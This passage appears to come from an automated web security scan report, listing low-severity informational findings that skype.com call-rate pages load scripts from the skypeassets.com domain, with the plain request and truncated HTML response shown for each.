Date: Sun, 04 Sep 2011 21:38:33 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.636. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antarctica  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-antarctica

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-antarctica HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:33 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.637. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.638. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-argentina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-argentina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-argentina HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.639. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-armenia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-armenia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-armenia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.640. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-aruba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-aruba

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-aruba HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.641. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.642. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-australia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-australia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-australia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.643. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-austria  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-austria

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-austria HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.644. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:35 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.645. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahamas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bahamas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bahamas HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:35 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.646. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahrain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bahrain

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bahrain HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:36 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.647. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bangladesh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-bangladesh

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-bangladesh HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:36 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.648. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-barbados  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-barbados

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-barbados HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:37 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.649. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belarus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-belarus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-belarus HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:37 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.650. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belgium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-belgium

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-belgium HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
